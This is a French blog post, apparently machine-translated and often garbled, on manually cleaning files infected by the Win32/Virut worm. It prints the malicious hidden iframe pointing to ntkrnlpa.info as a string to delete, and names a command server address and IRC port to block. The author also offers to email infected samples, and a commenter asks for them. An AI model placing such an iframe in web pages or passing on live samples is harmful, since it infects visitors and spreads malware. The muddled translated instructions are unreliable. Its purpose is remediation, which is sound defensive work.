J'ai trouvé ce frustrant que la plupart des anti-virus produit ou supprimé votre quarantaine les fichiers infectés. J'ai perdu de nombreux projets en raison de ce vers. Ne pas utilisé "auto-clean/fix" Analyse en ligne si vous favorise vos projets. Cités ici n'est pas de mesures pour win32/Virut fixe. Si vous n'aimez pas l'édition manuel vous aurez besoin d'une recherche et le remplacement des outils pour enlever le code d'intégration dans les fichiers infectés.
- Assurez-vous que tous les malades (*. exe win32/virtob) des fichiers a été quarantaine.
- En option bloquer l'accès à l'émetteur 78.109.19.139:80 & irc port 65520 dans vos paramètres de pare-feu.
- Handicapés AntiVirus le cas échéant.
- L'arrêt votre PC et démarrez Windows sur SafeMode (Appuyez sur F8 ou F5 après BIOS écran).
- Recherche tous les fichiers *. htm, *. html, *. php, *. asp extensions.
supprimer ou remplacer le texte suivant (cordes)<iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"> </ iframe>
Rechercher et remplacer des outils
- Pour Windows - il ya beaucoup d'outils similaires et je ne suis pas sûr de l'un de recommander car il ne semble plus la même chose pour Google afin "de recherche et de remplacement de" choisir le meilleur.
- Pour Cygwin ou * nix bash console - Utilisé sed commandes à la recherche et le remplacement des chaînes dans tous les fichiers infectés.
- Python dans les fenêtres - Vous pouvez essayer cette solution.
Win32/Virut Virustotal.com résultats
Antivirus Version Dernière mise à jour Résultat AhnLab-V3 2007.11.12.0 2007.11.12 -- AntiVir 7.6.0.34 2007.11.12 W32/Virut.AF Authentium 4.93.8 2007.11.10 -- Avast 4.7.1074.0 2007.11.11 Win32: Virtob AVG 7.5.0.503 2007.11.11 Win32/Virut BitDefender 7,2 2007.11.12 Win32.Virtob.6.Gen CAT-QuickHeal 9,00 2007.11.12 W32.Virut.K ClamAV 0.91.2 2007.11.12 W32.Virut-5 DrWeb 4.44.0.09170 2007.11.12 Win32.Virut.19 eSafe 7.0.15.0 2007.11.08 -- eTrust-Vet 31.2.5289 2007.11.12 Win32/Virut.6375 Ewido 4,0 2007.11.12 -- FileAdvisor 1 2007.11.12 -- Fortinet 3.11.0.0 2007.10.19 W32/Virut.AE F-Prot 4.4.2.54 2007.11.10 W32/Injector.A.gen! Eldorado F-Secure 6.70.13030.0 2007.11.12 Virus.Win32.Virut.ab Ikarus T3.1.1.12 2007.11.12 Win32.Virtob.AS Kaspersky 7.0.0.125 2007.11.12 Virus.Win32.Virut.ab McAfee 5160 2007.11.09 W32/Virut.g Microsoft 1.3007 2007.11.12 Virus: Win32/Virut.Q NOD32v2 2653 2007.11.12 -- Norman 5.80.02 2007.11.09 W32/Virut.W Panda 9.0.0.4 2007.11.11 W32/Virutas.W Prevx1 V2 2007.11.12 -- Rising 20.18.02.00 2007.11.12 Win32.Virut.z Sophos 4.23.0 2007.11.12 W32/Vetor-G Sunbelt 2.2.907.0 2007.11.09 VIPRE.Suspicious Symantec 10 2007.11.12 W32.Virut.W TheHacker 6.2.9.124 2007.11.12 W32/Virut.gen VBA32 3.12.2.4 2007.11.11 -- VirusBuster 4.3.26:9 2007.11.11 Win32.Virut.Gen.4 WebWasher-Gateway 6.0.1 2007.11.12 Win32.Virut.AF Notes sur Microsoft Windows Malicious outil de suppression des logiciels
Mise à jour: Nov, 20 2007 par NoahArk
J'ai Win.32/virut fichiers dans mes archives (pour fins de sauvegarde). La semaine dernière, j'ai installé Microsoft Windows de suppression des logiciels malveillants outil v1.35 (Nov 13, 2007, KB890830).
Microsoft revendiqué cet outil peut w32/Virut fixe. Mais le résultat est beaucoup worsed que je m'attendais. Il ne détecte pas mon Win32/Virut sur Windows XP SP2 plutôt à mi-chemin avant l'analyse complète de son déclenchement et le ver commence à se propager comme Win32/virtob & Virut [AW] (infectant *. exe et *. html). Je éliminé tous les outils de suppression de Microsoft (MS Malicious outil de suppression des logiciels, Défenseur MS, MS Baseline Security Analyzer). Microsoft Developer aurait dû mieux connaître sur la façon de prévenir la plupart de ces types infections.Its leur propre conception des défauts et des produits. Je continue à tenir le Win32/Virut fichiers infectés, si quelqu'un besoin s’il vous plaît envoyer un courriel à
. Ma demande à Microsoft équipe, ils doivent nettoyer ce crapy vers de sorte que tous ces malheureux du client (y compris moi) ont l'habitude de chasser sur les solutions antivirus cher. W32/Virut et ntkrnlpa.info
Les vers ont commencé la diffusion depuis Septembre 2006. Après une année anniversaire Il reste dans la nature comme elle ne pourra jamais cesser.
J'aimerais envoyer une lettre à ntkrnlpa.info fournisseur d'accès Internet (hosting.ua), et ils ont fermé les sites pour de bon. Et aussi google bloque le site aussi, il vous donnera un avertissement si la recherche d'URL.
Ce ver propagation via les balises HTML simple et a augmenté la taille du fichier autour de 8 ko. En raison de cette méthode simple et le plus faible des dommages Anti-Virus et sécurité vendeur étiquette comme moyen et faible. Le fil étiquette est discutable.
Sur la base de wikipedia "Usage part du navigateur Web Statistics», 81% des utilisateurs de l'Internet est l'utilisation de Microsoft Internet Explorer (50% des visiteurs de ce blog est trop sur IE), navigateur IE ne pas bloqué IFRAME qui peut être un problème.
Imaginez si certains webmaster téléchargé les fichiers infectés un lourd trafic sur les sites Web comme MySpace and Facebook. Les résultats pourraient être en cas de catastrophe. Personne ne veulent voir ses passe-t-il.
Nombre connexes
- Novembre 12, 2007 at 12:35 pm
- Février 8, 2008 à 10:58 am
- 0,3
- Web
2 réponses à "Corrections pour les fichiers infectés par le Win32/virut.Virtob et variantes"
Trackback URL: Utilisez le Trackback URL ↑ de ping cet article. Si votre blog ne supporte pas les trackbacks vous pouvez laisser un commentaire au lieu.
"écrire comme si vous parliez à un bon ami (en face de votre mère)."
. Votre avis?
Avertissement: Pour tout contenu que vous affichez, vous octroyez à Kakkoi la redevance-libre, irrévocable, perpétuelle, exclusif et entièrement sublicensable d'utiliser, reproduire, modifier, adapter, publier, traduire, créer des œuvres dérivées, de distribuer, de réaliser et afficher un tel contenu, en tout ou en partie, à l'échelle mondiale et de l'incorporer dans d'autres œuvres, sous toutes ses formes, médias ou technologie connue à présent ou développée ultérieurement. Certains droits réservés.
Le problème dans la prévention de virus comme le Virut types est qu'ils le changement "bothosts", ainsi que le que le cryptage à chaque nouvelle variante à venir. Une bonne solution pour éviter que votre machine de faire indésirables non autorisé se connecte par un processus inconnu ou d'un programme est d'avoir par exemple une ZoneAlarm pare-feu installé (qui permet précisément de blocage, par exemple, STMP pour des programmes - la valeur par défaut est «bloqué» -, de blocage de port spécifié (IRC par exemple), de prévention et de refuser tout trafic entrant non sollicité, ainsi que l'adaptation IDENT port de se cacher, (moyens il s'agit d'un vrai pare-feu de stealth). spécifiée et comportements concernant la sécurité Internet, intranet, les collectivités locales, des zones de sécurité, ainsi qu'un 5-étape profil de sécurité de mettre de certains programmes).
En outre, l'utilisateur est informé sur chaque réseau d'action et les tentatives d'accès - ingoing ainsi sortant - avec la source,
cible, le port et le programme ou le nom de processus qui initie la connexion. Prévenir le spam-bot comportement signifie: ne permettent 'votre' connu programmes de courrier à envoyer des mails. Ne rangez jamais de mot de passe sur la machine ou dans le programme de messagerie! Set 'SMTP action »à« mot de passe requis "même si SMTP de votre fournisseur n'a pas besoin (dans l'affirmative, cela signifie anonymes SMTP est permis, alors vous
BAD ont un FAI qui est vraiment spambots invitant à étaler leurs ordures célèbre dans le monde entier!).
Essentielles de sécurité règles sont encore ignorés par le fournisseur d'accès dans de tels cas. Par la même façon, les clients de ces FAI sont victimes de ceux-ci. Pour aller chercher un autre fournisseur d'accès Internet si possible. Tous les autres programmes devraient être bloquées pour SMTP (et le CRI) ainsi protocoles. Cela est essentiel dans les jours pour garder une machine infectée tranquille vers l'Internet, même si elle est éventuellement infectés par le ver de certains étranges, ou botclient logiciel. (Puis l'ordinateur est appelé «à coups de pierres» ou comment il est également dit par la sécurité des personnes, un soi-disant «Zombie»). Ne jamais laisser HTTP ou tout autre demandes envoyées à d'autres programmes d'annulation de votre navigateur connu, les médias ou les acteurs -
transfert de fichiers, du courrier et des programmes de discussion. Est important de savoir que «Adware», «Nag-Ware» et «Spy-ware' chargée des programmes sont toujours essayer de téléphone à domicile '!
Même ne Malware qui tente d'atteindre ou au moins l'écoute de leur «maître hôtes, (bien sûr pour permettre à ces installations de sécurité sur votre système pour mettre à jour eux-mêmes par leurs hôtes connus code). En utilisant une liste d'accueil qui y sont contenues redirections serveurs qui ne mène nulle part (sous l'hôte local) est également un bon indice. Ce fichier est également protégée d'être trafiqués (suppressions non autorisées ou des ajouts par n'importe quel logiciel ou site web scripts) par un logiciel tiers (c'est-à-dire ZoneAlarm, McAffee, Nod32).
salut il
Can U s’il vous plaît envoyez-moi ces fichiers, je tiens simplement à les utiliser pour but l'apprentissage
MERCI BUDDY